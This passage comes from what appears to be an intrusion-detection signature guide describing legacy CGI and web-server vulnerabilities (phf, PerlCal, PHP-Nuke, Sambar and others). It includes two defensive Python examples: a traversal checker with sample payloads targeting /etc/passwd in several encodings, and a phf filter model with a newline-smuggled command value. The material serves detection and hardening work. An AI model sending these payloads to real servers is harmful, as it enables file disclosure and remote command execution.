Gold or one of the other HTML editors. This CGI has a well-known directory traversal vulnerability in versions prior
to 1.2 that allows remote attackers to overwrite arbitrary files via a '..' (dot dot) in the path name of an upload
operation.
Signature ID: 146
Multiple Vendor nph-test-cgi Vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0045 Bugtraq: 686 Nessus: 10165
Signature Description: No Parsed Headers (NPH) scripts print the entire HTTP response, including all necessary
header fields, so the web server does not parse the headers or add any missing ones. A security hole exists in the
nph-test-cgi script included in most UNIX-based web server distributions. nph-test-cgi, which prints out information
on the current web environment (just like 'test-cgi' does), does not enclose the arguments it passes to the 'echo'
command inside double quotes ("). Shell wildcard characters such as '*' supplied in the query string are therefore
expanded by the shell, so an attacker can browse the server's file system using specially crafted GET requests.
Signature ID: 148
Oracle XSQL Sample Application Vulnerability
Threat Level: Warning
Nessus: 10613
Signature Description: Oracle Application Server is a J2EE-certified application server. Oracle 9i AS integrates the
technology required to develop and deploy e-business portals, transactional applications, and web services into a
single product. It installs with sample pages that demonstrate various functions of the software, many of which can be
used by attackers to breach the security of the system. Specially crafted requests to
'/xsql/java/xsql/demo/adhocsql/query.xsql' can be used to run arbitrary SQL queries (under an unprivileged account)
via the 'sql' parameter. Although the user cannot modify or delete data in the database, this vulnerability can be
used to enumerate database users and view table names.
Signature ID: 149
MacOS X Finder reveals contents of Apache Web directories vulnerability
Threat Level: Warning
Industry ID: CVE-2001-1446 Bugtraq: 3316,3325,3324 Nessus: 10756
Signature Description: Mac OS X is a line of computer operating systems developed, marketed, and sold by Apple
Inc. that comes pre-loaded on Macintosh computers. 'Finder' is the default application on Mac OS and Mac OS X
responsible for the overall user management of files, disks and network volumes and for launching other applications.
Mac OS X creates a hidden file, '.DS_Store', in each directory that has been viewed with the Finder. This file contains
a list of the contents of the directory. On Apple Mac OS X 10.0 to 10.0.3 running the bundled Apache 1.3.14 web
server, an attacker can retrieve this file through mixed-case file requests. Accessing this file gives an attacker
information about the structure and contents of the web server's directories.
Signature ID: 150
MacOS X Finder reveals contents of Apache Web files vulnerability
Threat Level: Warning
Industry ID: CVE-2001-1446 Bugtraq: 3325 Nessus: 10773
Signature Description: Mac OS X is a line of computer operating systems developed, marketed, and sold by Apple
Inc. that comes pre-loaded on Macintosh computers. Find-By-Content in Mac OS X 10.0 through 10.0.4 creates index
files named '.FBCIndex' in every directory. A remote attacker can read the indexed contents of the files in a
directory by requesting that file from the web server, thereby learning the contents of files in web-accessible
directories. This may expose sensitive information including potential passwords, system configuration and installed
applications, which the attacker can use to further compromise the server in subsequent attacks.
Signature ID: 151
Outlook Web anonymous access vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0660 Bugtraq: 3301 Nessus: 10781
Signature Description: Microsoft Exchange Server is a messaging and collaborative software product developed by
Microsoft, whose major features consist of electronic mail, calendaring, contacts and tasks. Outlook Web Access (OWA)
in Microsoft Exchange Server 5.5 up to SP4 is vulnerable to an access validation error that may lead to information
disclosure: an unauthenticated user can gain read access to the entire Global Address List. This information can be
used by the attacker in subsequent social engineering attacks.
Signature ID: 152
Oracle Web Listener Batch File Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0169 Bugtraq: 1053
Signature Description: Oracle Web Listener is a general-purpose application server from Oracle. Oracle Web Listener
4.0.x for NT uses various batch files as cgi scripts. These are stored in the /ows-bin/ directory by default. Any of these
batch files can be used to run arbitrary commands on the server by appending '?&' and a command to the filename.
UNC paths can be used to cause the server to download and execute remote code.
Signature ID: 153
WEB-CGI pagelog.cgi directory traversal vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0940 Bugtraq: 1864 Nessus: 10591
Signature Description: Metertek's pagelog.cgi is a CGI script that logs details about visits to the web pages on the
web server. The script displays the number of hits and emails the log data about visitors after a specified number of
visits. A directory traversal vulnerability in Metertek pagelog.cgi 1.0 allows remote attackers to read and create or
overwrite .log or .txt files via a '..' (dot dot) character sequence passed in the "name" or "display" parameter.
Signature ID: 154
WebPALS Remote Command Execution Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0217 CVE-2001-0216 Bugtraq: 2372 Nessus: 10611
Signature Description: Initiated at Mankato State University in 1978, the name PALS was originally an acronym for
Project for Automated Library Systems. Originally a Minnesota State University System undertaking, PALS now
serves all of the Minnesota State Colleges and Universities. The MnSCU/PALS Library System WebPALS 1.0 'pals-cgi'
program allows remote attackers to read arbitrary files via a '..' (dot dot) character sequence and to execute
arbitrary commands via shell metacharacters in the documentName parameter.
Signature ID: 155
PCCS-Mysql User/Password Exposure vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0707 Bugtraq: 1557 Nessus: 10783
Signature Description: PCCS-Mysql Database Admin Tool is a web-based front end to MySQL written in PHP. PCCS
MySQL Database Admin Tool Manager 1.2.4 and earlier install the file dbconnect.inc within the web root, which
allows remote attackers to obtain sensitive information, such as the username and password used to connect to the
database, by requesting it over HTTP, as demonstrated by
'http://your_site.com/pccsmysqladm/incs/dbconnect.inc'.
Signature ID: 156
ActivePerl perlIS.dll Buffer Overflow vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0815 Bugtraq: 3526 Nessus: 10811
Signature Description: ActivePerl is an implementation of the Perl scripting language for Microsoft Windows systems
developed by ActiveState. ActivePerl allows for high-performance integration with IIS using a DLL called 'PerlIS.dll'
that handles the '.plx' ISAPI extension. A buffer overflow in PerlIS.dll in ActiveState ActivePerl 5.6.1.629 and
earlier allows remote attackers to execute arbitrary code via an HTTP request for a long filename (greater than 350
bytes) that ends in a .pl extension, due to an unbounded string copy operation.
Signature ID: 157
Perl http Directory Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0883 Bugtraq: 1678 Nessus: 10511
Signature Description: Mandrake Linux is a Linux distribution created by Mandrakesoft that uses the RPM Package
Manager. The default configuration files for the versions of mod_perl shipped with Mandrake Linux 6.1 through 7.1
contain a misconfiguration: a request to list the /perl directory is permitted because it is within the web root. An
attacker can thus see a listing of the files present in /perl and target any scripts there that are known to be
vulnerable.
Signature ID: 158
PerlCal Directory Traversal Vulnerability
Threat Level: Severe
Industry ID: CVE-2001-0463 Bugtraq: 2663 Nessus: 10664
Signature Description: PerlCal is a CGI script written by Acme Software that allows web-based calendar sharing and
related functions. Acme Software PerlCal 2.3 through 2.95 allows remote users to traverse the filesystem of a target
host through the use of the double-dot '../' character sequence in the p0 parameter. This attack may lead to the
disclosure of sensitive information and may be of assistance in further attacks.
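PerlCal, pagelog.cgi, WebPALS, nph-publish.cgi, GWWEB.exe, newsdesk.cgi and netauth.cgi above all share one missing check: the script joins a client-supplied path onto a base directory and never confirms the result still lies beneath it. The following Python is an added example, not code from this guide or from any of those products. It shows the containment check those scripts lack, applied to the encodings an attacker uses to slip past a naive '../' filter: plain dot-dot, percent-encoded and double-percent-encoded dots, backslashes, and a trailing null byte. The base directory and sample paths are constructed for the example.

```python
import posixpath
from urllib.parse import unquote


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so that %2e%2e%2f and the double-encoded
    %252e%252e%252f both collapse to '../'; stop once nothing changes."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_under(base: str, user_path: str):
    """Resolve a user-supplied path beneath base with POSIX rules and report
    whether the result is still inside base.  Backslashes are treated as
    separators and a NUL truncates the name, mirroring what a C-level open()
    behind a Perl or PHP script actually receives."""
    candidate = fully_decode(user_path).replace("\\", "/")
    candidate = candidate.split("\x00", 1)[0]
    base = posixpath.normpath(base)
    resolved = posixpath.normpath(posixpath.join(base, candidate.lstrip("/")))
    inside = resolved == base or resolved.startswith(base + "/")
    return resolved, inside


def is_traversal(base: str, user_path: str) -> bool:
    """True when the supplied path would escape the intended directory."""
    return not resolve_under(base, user_path)[1]


# Constructed parameter values in the shapes the entries above describe,
# mapped to whether they should be flagged.  The base directory is a
# placeholder, not any product's real layout.
BASE = "/var/www/cgi-data"
SAMPLES = {
    "news/today.txt": False,
    "../../../../etc/passwd": True,
    "%2e%2e/%2e%2e/%2e%2e/etc/passwd": True,
    "%252e%252e%252f%252e%252e%252fetc/passwd": True,
    "..\\..\\..\\boot.ini": True,
    "../../../etc/passwd%00.html": True,
    "images/../styles/site.css": False,
}


def check_samples(base: str = BASE, samples: dict = SAMPLES) -> dict:
    """Map each sample to (resolved_path, flagged_as_traversal)."""
    return {p: (resolve_under(base, p)[0], is_traversal(base, p)) for p in samples}


if __name__ == "__main__":
    for path, (resolved, flagged) in check_samples().items():
        print(f"{path!r:45} -> {resolved:32} {'TRAVERSAL' if flagged else 'ok'}")
```

The check is done on the resolved path, not on the presence of '..' in the input: `images/../styles/site.css` contains a dot-dot yet stays inside the base and is allowed, while every escaping form is caught regardless of how it was encoded. On a real filesystem the same comparison should be made after `os.path.realpath()` so that symbolic links inside the base cannot point outside it either.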
Signature ID: 159
Perl interpreter can be launched as a CGI vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0509 Nessus: 10173
Signature Description: This signature detects perl.exe being accessed through the web server. The Common Gateway
Interface (CGI) is a standard protocol for interfacing external application software with a web server. To execute
CGI scripts, a web server must be able to access the interpreter used for that script. Most web servers have a
directory dedicated to such applications, known as the 'CGI bin directory'. Early documentation for Netscape and
other servers recommended placing the interpreters in the CGI bin directory to ensure that they were available to
run the script. An interpreter reachable from the web in this way can be invoked directly by remote clients, allowing
them to execute arbitrary commands.
Signature ID: 160
WEB-CGI pfdispaly.cgi arbitrary command execution vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0270 Bugtraq: 64 Nessus: 10174
Signature Description: IRIX is a computer operating system developed by Silicon Graphics, Inc. to run natively on
their 32- and 64-bit MIPS architecture workstations and servers. A vulnerability exists in the 'InfoSearch' package
included by Silicon Graphics in the IRIX operating system: the CGI program 'pfdispaly.cgi' (the file name is spelled
this way) in IRIX 6.2 through 6.4 could allow remote users to view any file on the system with 'nobody' privileges.
Signature ID: 161
Phf Remote Command Execution Vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0067 Bugtraq: 629 Nessus: 10176
Signature Description: The NCSA HTTPd was a web server originally developed at the NCSA. It was among the
earliest web servers developed. The Apache HTTP Server is a web server developed and maintained by an open
community of developers under the auspices of the Apache Software Foundation. Apache web server's initial versions
were based on NCSA's httpd. A vulnerability exists in the sample cgi-bin program 'phf' included with NCSA httpd
1.5 and Apache 1.0.3 and prior versions of both servers. By supplying certain characters, remote users can execute
arbitrary commands with the privileges of the httpd process. The phf CGI program calls the escape_shell_cmd()
function, which is intended to filter dangerous characters from user input before the strings are passed to
shell-based library calls such as popen() or system(). However, it fails to filter the newline character (%0a), which
the shell treats as a command separator, so commands appended after an encoded newline are executed.
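The phf entry above is the canonical illustration of why a blacklist escaping filter in front of popen() or system() fails. The following Python is an added example, not code from this guide, from NCSA httpd or from Apache. It approximates the escape_shell_cmd() character set and sets it beside two fixes: quoting the whole value with shlex.quote, and the preferred one, passing the value as a single argv element so no shell is involved. A small model of how /bin/sh splits a line into commands is used to show the bypass without executing anything. 'ph -m' and the query values are placeholders, not phf's real invocation or parameters.

```python
import shlex

# The characters NCSA's escape_shell_cmd() backslash-escaped, reconstructed
# for this example from its documented behaviour.  Newline is not among them.
ESCAPED = set("&;`'\"|*?~<>^()[]{}$\\")


def escape_shell_cmd_like(s: str) -> str:
    """Approximation of the original filter: prefix each listed character
    with a backslash and pass everything else, newline included, through."""
    return "".join("\\" + c if c in ESCAPED else c for c in s)


def split_commands(cmdline: str) -> list:
    """Tiny model of how /bin/sh cuts a line into commands: a backslash
    protects the next character, single quotes protect their contents, and
    an unprotected ';' or newline starts a new command."""
    commands, current, in_single, i = [], [], False, 0
    while i < len(cmdline):
        c = cmdline[i]
        if in_single:
            if c == "'":
                in_single = False
            else:
                current.append(c)
        elif c == "\\" and i + 1 < len(cmdline):
            i += 1
            current.append(cmdline[i])
        elif c == "'":
            in_single = True
        elif c in ";\n":
            commands.append("".join(current).strip())
            current = []
        else:
            current.append(c)
        i += 1
    commands.append("".join(current).strip())
    return [cmd for cmd in commands if cmd]


def phf_style_cmdline(query_value: str) -> str:
    """Command line built the way phf did it: filter, then interpolate into
    a string handed to popen().  'ph -m' stands in for the real invocation."""
    return "ph -m " + escape_shell_cmd_like(query_value)


def hardened_cmdline(query_value: str) -> str:
    """Same interpolation, but shlex.quote single-quotes the whole value so
    a newline inside it can no longer end the command."""
    return "ph -m " + shlex.quote(query_value)


def hardened_argv(query_value: str) -> list:
    """Preferred fix: no shell at all; the value is exactly one argument."""
    return ["ph", "-m", query_value]


def commands_run(cmdline: str) -> int:
    """How many separate commands the shell would execute for cmdline."""
    return len(split_commands(cmdline))


if __name__ == "__main__":
    for payload in ("name=x;id", "name=x\nid"):   # constructed query values
        print(repr(payload), "filter:", commands_run(phf_style_cmdline(payload)),
              "quoted:", commands_run(hardened_cmdline(payload)),
              "argv:", hardened_argv(payload))
```

With `name=x;id` the original filter holds, because ';' is on its list; with `name=x\nid` the same filter lets a second command through, which is exactly the %0a bypass the signature looks for. The argv form removes the problem class rather than one character.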
Signature ID: 162
IIS phonebook Server Buffer Overflow vulnerability
Threat Level: Warning
Industry ID: CVE-2000-1089 Bugtraq: 2048 Nessus: 10564
Signature Description: Microsoft IIS is a popular web server package for Windows based platforms. Windows NT 4.0
and Windows 2000 are preemptive, graphical and business-oriented operating systems designed to work with either
uniprocessor or symmetric multi-processor computers. The Phone Book Service is an optional component that ships
with the NT 4 Option Pack and Windows 2000. This Service is used in conjunction with Dial Up Networking clients to
provide computers with a pre-populated list of dial-up networking servers. A buffer overflow vulnerability was
discovered in the URL processing routines of the Phone Book Service requests on IIS 4 and IIS 5. If exploited, this
vulnerability allows an attacker to execute arbitrary code with the privileges of the IUSR_machinename account (IIS 4)
or the IWAM_machinename account (IIS 5).
Signature ID: 163
WEB-CGI php.cgi access vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0238 Bugtraq: 2250 Nessus: 10177
Signature Description: PHP/FI (Personal Home Page / Forms Interpreter) is a software suite designed to offer enhanced
features to sites served via the World Wide Web and is maintained by the PHP development team. A problem in
PHP/FI 2.0 could allow remote users access to restricted resources. Due to a design problem in the software package,
the PHP/FI software package allows a remote user to browse directories and view files stored on the local host with the
privileges of httpd process. An attacker can gather sensitive information that he can use in subsequent attacks.
Signature ID: 164
PHP-Nuke Remote File (Copy/Delete) Vulnerability
Threat Level: Severe
Industry ID: CVE-2001-1032 Bugtraq: 3361 Nessus: 10772
Signature Description: PHP-Nuke is a website creation/maintenance tool written in PHP3. PHP-Nuke versions 5.2 and
earlier suffer from a vulnerability caused by inadequate processing of queries by PHP-Nuke's admin.php, which enables
attackers to copy any file on the system to any other location on it, or even to delete files.
Signature ID: 165
PHP-Nuke security vulnerability (bb_smilies.php)
Threat Level: Warning
Industry ID: CVE-2001-0320 CVE-2001-0001 Bugtraq: 2422 Nessus: 10630
Signature Description: PHP-Nuke is a web-based automated news publishing and content management system based
on PHP and MySQL. bb_smilies.php in PHP-Nuke 4.4 allows remote attackers to gain PHP administrator privileges
and read arbitrary files by inserting a null character and '..' (dot dot) sequence into a malformed username argument.
Signature ID: 166
PHP-Nuke Gallery Add-on Arbitrary File View Vulnerability
Threat Level: Severe
Industry ID: CVE-2001-0900 Bugtraq: 3554 Nessus: 10810
Signature Description: PHP-Nuke is a web-based automated news publishing and content management system based
on PHP and MySQL. Bharat Mediratta's Gallery is a free, open-source web-based photo album which may be used as an
add-on for the PHP-Nuke web portal. Bharat Mediratta Gallery 1.2.2 and prior versions on Francisco Burzi PHP-Nuke
5.0 are vulnerable to a directory traversal vulnerability that allows remote users to view arbitrary files on the web
server with the privileges of the web server.
Signature ID: 167
PHP-Nuke opendir vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0321 Nessus: 10655
Signature Description: PHP-Nuke is a web-based automated news publishing and content management system based
on PHP and MySQL. PHP-Nuke version 4.4 contains a vulnerability in the handling of the requesturl URL parameter
when it is passed to the opendir.php script. A remote attacker can view the contents of files readable by the web
server. The attacker can also submit a URL pointing to an external PHP script on another host, which is then
retrieved and included, i.e. executed. Hence, arbitrary command execution with the privileges of the HTTP server is
possible.
Signature ID: 168
PHP/FI Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0058 Bugtraq: 712 Nessus: 10178
Signature Description: PHP is a scripting language designed for producing dynamic web pages. The PHP/FI package,
originally written by Rasmus Lerdorf, is an HTML-embedded scripting language. Since its inception PHP/FI has been
turned over to another development team and is now known simply as PHP. PHP/FI 2.0 b10 and prior versions are
vulnerable to a buffer overflow in the FixFilename() function in file.c. If strings roughly 8 kilobytes long are
passed to the function's 128-byte buffers, the stack can be overwritten, making it possible for an attacker to obtain
shell access to the machine running the web server.
Signature ID: 169
Pi3Web tstisapi.dll overflow vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0302 CVE-2001-0303 Bugtraq: 2381 Nessus: 10618
Signature Description: John Roy's Pi3Web is a free, multithreaded, highly configurable and extensible HTTP server
and development environment for cross-platform Internet server development and deployment. The ISAPI application
tstisapi.dll in Pi3Web 1.0.1 has multiple vulnerabilities. A buffer overflow exists due to a failure to properly
handle user-supplied input: requesting a specially crafted URL overflows the buffer and may allow the execution of
arbitrary code. It is also possible to disclose the physical path to the web root by requesting an invalid URL.
Signature ID: 170
PlusMail vulnerability
Threat Level: Severe
Industry ID: CVE-2000-0074 Bugtraq: 2653 Nessus: 10181
Signature Description: PowerScripts PlusMail Web Control Panel is a web-based administration suite for maintaining
mailing lists, mail aliases, and web sites. In PowerScripts PlusMail WebConsole 1.0, it is possible to change the
administrative username and password without knowing the current password, by submitting the arguments
"new_login" with the value "reset password", "username" with the new login name as value, "password" and
"password1" with matching new password values to the plusmail script (typically available at /cgi-bin/plusmail). The
web console can then be used to launch a range of potentially destructive activities including changing of e-mail
aliases, mailing lists, web site editing, and various other privileged tasks.
Signature ID: 171
CGI-World Poll It Internal Variable Override Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0590 Bugtraq: 1431
Signature Description: 'Poll It' is a Perl CGI application used to create and maintain opinion polls on websites. The
program relies on a number of internal variables. These variables can be overwritten by any remote user by specifying
the new value as a variable in the GET request. This is due to the fact that 'Poll It' overwrites variables to user-supplied
values after it sets them to the internally-specified defaults. This can lead to unauthorized file reads, as well as
potentially other compromises.
Signature ID: 172
Cognos Powerplay WE Vulnerability
Threat Level: Warning
Bugtraq: 491 Nessus: 10187
Signature Description: Cognos Powerplay Web Edition is a commercial Business Performance Measurement and
Reporting application. It is an Online Analytical Processing (OLAP) software package. In any OLAP system, the collection of
data is represented as a 'Cube'. Cognos Powerplay Web Edition 4.0 to 6.5 (inclusive) may serve data cubes in a non-secure
manner. Execution of the PowerPlay CGI pulls cube data into files in an unprotected temporary directory. These
files are then fed back to frames in the browser. It is possible for an unauthenticated user to view these data files before
they are purged.
Signature ID: 173
WEB-CGI printenv access vulnerability
Threat Level: Warning
Industry ID: CVE-2000-1205 CVE-2007-4049 Bugtraq: 4431 Nessus: 10188
Signature Description: The /cgi-bin/printenv.pl program is a small Perl routine which, when invoked, returns the CGI
environment variables set on the server upon which it was invoked. This code can be used to retrieve all of the CGI
environment variables and print them out (while testing the code) and must not be available on the server except during
development of the website. This script gives an attacker valuable information about the configuration of your web
server, allowing him to focus his attacks.
Signature ID: 174
WEB-CGI Processit access vulnerability
Threat Level: Warning
Nessus: 10649
Signature Description: Pick System's processit.pl CGI script provides an easy HTML form to D3 PICK/Basic program
interface. It contains a vulnerability that allows system environment variables to be viewed by remote users. When a
request is made for an incorrect file or made with no parameters, the CGI script will return environment variables. This
can provide remote users with potentially sensitive data (e.g. script location, SERVER_SOFTWARE,
DOCUMENT_ROOT). The exact versions that are vulnerable are unknown.
Signature ID: 175
Quickstore traversal vulnerability
Threat Level: Warning
Industry ID: CVE-2000-1188 Bugtraq: 2049 Nessus: 10712
Signature Description: Quikstore is an ecommerce shopping cart software package from i-Soft. A vulnerability exists
in Quikstore Shopping Cart in Quikstore 2.0 to 2.9.10. A failure to properly validate user-supplied input leads the script
to disclose files not normally available to a remote user. This could include any file on the affected host, including
password files, server configuration information, credit card information, business models, and other sensitive data.
Signature ID: 176
Extent RBS ISP Directory Traversal vulnerability
Threat Level: Warning
Industry ID: CVE-2000-1036 Bugtraq: 1704 Nessus: 10521
Signature Description: Extent RBS is a back-office billing and "Authentication, Authorization and Accounting"
(AAA) solution for Internet Service Providers (ISPs) that provides remote management through the web. Extent
Technologies RBS ISP 2.5 is vulnerable to a directory traversal attack. Appending '../' to the 'image' variable in HTTP
requests to port 8002 will enable a user to read any available file with the privileges of the HTTP daemon, including credit
card details, usernames, passwords, etc.
Signature ID: 177
Martin Hamilton ROADS' search.pl Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0215 Bugtraq: 2371 Nessus: 10627
Signature Description: The Martin Hamilton ROADS software is a free Internet resource cataloging system, written in
Perl. In Martin Hamilton ROADS 2.3, the 'search.pl' program allows remote attackers to read arbitrary files by
specifying the file name in the form parameter and terminating the file name with a null byte.
Signature ID: 178
Roxen counter module vulnerability
Threat Level: Warning
Nessus: 10207
Signature Description: The Roxen Challenger is a web server written in the Pike language. In multiple versions of Roxen
Challenger, requesting large counter GIFs consumes a huge amount of CPU time on the server. If the server does not
support threads, this will prevent the server from serving other clients. Thus, an attacker can launch a denial of service
attack.
Signature ID: 179
Caldera OpenLinux 2.3 rpm_query CGI Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0192 Bugtraq: 1036 Nessus: 10340
Signature Description: Linux is a Unix-like computer operating system. Caldera OpenLinux is a defunct Linux
distribution that was created by the Caldera Systems corporation. The default installation of Caldera OpenLinux 2.3
includes the CGI program rpm_query, which allows remote attackers to determine what packages are installed on the
system. The 'rpm_query' CGI is installed in '/home/httpd/cgi-bin/'. Any user can run this CGI and obtain a listing of the
installed packages with version information. This could be used to determine the vulnerable software on the server.
Signature ID: 180
Sambar Web Server CGI scripts vulnerability
Threat Level: Severe
Industry ID: CVE-2000-0213 Bugtraq: 1002 Nessus: 10246
Signature Description: Sambar server is a multi-threaded, extensible application server with highly programmable API.
Sambar Server 4.2 beta 7 for Windows NT and 2000 supports DOS-style batch programs as CGI scripts. A remote
attacker can use any batch file used by the server in the 'cgi-bin' directory to run any valid command-line program with
administrator privileges. This allows the attacker to read, modify, create, or delete any file or directory on the system,
including user accounts, etc. Even if the user hasn't enabled or created any batch files, the software ships with two by
default: 'hello.bat' and 'echo.bat'.
Signature ID: 181
Sambar /cgi-bin/mailit.pl vulnerability
Threat Level: Severe
Nessus: 10417
Signature Description: Sambar server is a multi-threaded, extensible application server with a highly programmable API.
Sambar Server 5.2 is vulnerable due to a demo CGI script called 'mailit.pl'. Even though access to 'mailit.pl' is
restricted to localhost, an attacker can still execute it using a specially crafted POST request. It can be used to relay
mail, to access files on the server and to upload files to the server.
Signature ID: 182
Sambar webserver pagecount file corruption vulnerability
Threat Level: Warning
Industry ID: CVE-2001-1010 Bugtraq: 3091,3092 Nessus: 10711
Signature Description: Sambar server is a multi-threaded, extensible application server with a highly programmable API.
A directory traversal vulnerability in the pagecount CGI sample script of Sambar Server 4.4 production to 5.0 beta
4 (inclusive) allows remote attackers to overwrite arbitrary files via a .. (dot dot) attack on the page parameter. Files
attacked in this manner will be corrupted. Loss of critical data and a denial of service may occur if system files are
overwritten.
Signature ID: 183
Directory listing through Sambar server search.dll vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0835 Bugtraq: 1684 Nessus: 10514
Signature Description: Sambar server is a multi-threaded, extensible application server with highly programmable API.
Sambar ISAPI Search utility 'search.dll' in Sambar Server 3.0 to 4.4 Beta 3 (inclusive) allows remote attackers to read
arbitrary directories by specifying the directory or invalid values in the 'query' parameter. This allows an attacker to
gain valuable information about the directory structure of the remote host and could reveal the presence of files which
are not intended to be visible. Such information can be used by the attacker in subsequent attacks.
Signature ID: 184
Sambar /session/sendmail vulnerability
Threat Level: Warning
Nessus: 10415
Signature Description: Sambar server is a multi-threaded, extensible application server with highly programmable API.
It provides a web interface for sending emails. An attacker can send mails to anyone by passing a POST request to
/session/sendmail. As Sambar server does not check the Referer mime field in the header, direct access to the server is
not necessary. Multiple versions may be vulnerable.
Signature ID: 185
Sambar /sysadmin directory vulnerability
Threat Level: Warning
Bugtraq: 2255 Nessus: 10416,11493
Signature Description: Sambar server is a multi-threaded, extensible application server with highly programmable API.
In Sambar Server 4.1 beta, the default authentication credentials for the administrator account are 'admin' with no
password. Once a remote user has gained knowledge of the path to log into the admin account, it is possible for the user
to login to the server using a http request. The path can be found by exploiting a vulnerable CGI script.
Signature ID: 186
Savant original form CGI access vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0521 Bugtraq: 1313
Signature Description: Michael Lamont Savant WebServer is a freeware open source web server for the windows
operating system family. Michael Lamont Savant WebServer 2.1 allows remote attackers to read source code of CGI
scripts. Omitting the HTTP version from a "GET" request for a CGI script to the Savant Web Server discloses the
source code of the script. This can give an attacker valuable information that can be used in subsequent attacks.
Signature ID: 187
WEB-CGI sdbsearch.cgi access vulnerability
Threat Level: Severe
Industry ID: CVE-2001-1130 Nessus: 10720
Signature Description: Linux is a Unix-like computer operating system. SUSE is a major retail operating system based
on the Linux kernel, produced in Germany and owned by Novell, Inc. 'Sdbsearch.cgi' in SuSE Linux 6.0-7.2 could allow
remote attackers to execute arbitrary commands by uploading a 'keylist.txt' file that contains filenames with shell
metacharacters, then causing the file to be searched using a '..' in the HTTP referer (from the HTTP_REFERER
variable) to point to the directory that contains the keylist.txt file. Thus a user can execute arbitrary commands with the
privileges of the HTTP server.
Signature ID: 188
WEB-CGI Amaya templates sendtemp.pl directory traversal vulnerability
Threat Level: Severe
Industry ID: CVE-2001-0272 Bugtraq: 2504 Nessus: 10614
Signature Description: W3C's Amaya is a WYSIWYG web browser and authoring program. A complement package
called 'templates server' provides the ability to retrieve templates from an apache web server for use in Amaya-based
authoring. One of the scripts used by the W3C templates server for Amaya 1.1 on W3C Amaya 4.3.2 called
'sendtemp.pl' is vulnerable to a directory traversal and file retrieval vulnerability. Using this script, an attacker can view
contents of directories outside of the configured template directory with the privileges of the apache web server
process.
Signature ID: 189
Shells in /cgi-bin vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0509 Nessus: 10252
Signature Description: A shell interpreter is software for interacting with the computer operating system using
commands to perform specific tasks. The Common Gateway Interface (CGI) is a standard protocol for interfacing
external application software with an information server, commonly a web server. All CGI based services are placed in
a particular folder on the http server. If a shell interpreter is placed in this folder, an attacker can execute any
commands with the privileges of the http server. This signature detects the access to Almquist shell in the CGI
directory.
Signature ID: 190
Shells in /cgi-bin vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0509 Nessus: 10252
Signature Description: A shell interpreter is software for interacting with the computer operating system using
commands to perform specific tasks. The Common Gateway Interface (CGI) is a standard protocol for interfacing
external application software with an information server, commonly a web server. All CGI based services are placed in
a particular folder on the http server. If a shell interpreter is placed in this folder, an attacker can execute any
commands with the privileges of the http server. This signature detects the access to Bourne-Again shell in the CGI
directory.
Signature ID: 191
Shells in /cgi-bin vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0509 Nessus: 10252
Signature Description: A shell interpreter is software for interacting with the computer operating system using
commands to perform specific tasks. The Common Gateway Interface (CGI) is a standard protocol for interfacing
external application software with an information server, commonly a web server. All CGI based services are placed in
a particular folder on the http server. If a shell interpreter is placed in this folder, an attacker can execute any
commands with the privileges of the http server. This signature detects the access to C shell in the CGI directory.
Signature ID: 192
Shells in /cgi-bin vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0509 Nessus: 10252
Signature Description: A shell interpreter is software for interacting with the computer operating system using
commands to perform specific tasks. The Common Gateway Interface (CGI) is a standard protocol for interfacing
external application software with an information server, commonly a web server. All CGI based services are placed in
a particular folder on the http server. If a shell interpreter is placed in this folder, an attacker can execute any
commands with the privileges of the http server. This signature detects the access to Korn shell in the CGI directory.
Signature ID: 193
Shells in /cgi-bin vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0509 Nessus: 10252
Signature Description: A shell interpreter is software for interacting with the computer operating system using
commands to perform specific tasks. The Common Gateway Interface (CGI) is a standard protocol for interfacing
external application software with an information server, commonly a web server. All CGI based services are placed in
a particular folder on the http server. If a shell interpreter is placed in this folder, an attacker can execute any
commands with the privileges of the http server. This signature detects the access to TENEX C shell in the CGI
directory.
Signature ID: 194
Shells in /cgi-bin vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0509 Nessus: 10252
Signature Description: A shell interpreter is software for interacting with the computer operating system using
commands to perform specific tasks. The Common Gateway Interface (CGI) is a standard protocol for interfacing
external application software with an information server, commonly a web server. All CGI based services are placed in
a particular folder on the http server. If a shell interpreter is placed in this folder, an attacker can execute any
commands with the privileges of the http server. This signature detects the access to Z shell in the CGI directory.
Signature ID: 195
Shells in /cgi-bin vulnerability
Threat Level: Severe
Industry ID: CVE-1999-0509 Nessus: 10252
Signature Description: A shell interpreter is software for interacting with the computer operating system using
commands to perform specific tasks. The Common Gateway Interface (CGI) is a standard protocol for interfacing
external application software with an information server, commonly a web server. All CGI based services are placed in
a particular folder on the http server. If a shell interpreter is placed in this folder, an attacker can execute any
commands with the privileges of the http server. This signature detects the access to Bourne shell in the CGI directory.
Signature ID: 196
ShopPlus Arbitrary Command Execution vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0992 Bugtraq: 3294 Nessus: 10774
Signature Description: Kabotie Software Technologies ShopPlus Cart is an e-commerce software for web stores.
Kabotie Software Technologies ShopPlus Cart 1.0 does not filter certain types of user-supplied input from web requests
via the "file" parameter. Characters like '|' or ';' are treated as valid by the software. This makes it possible for a
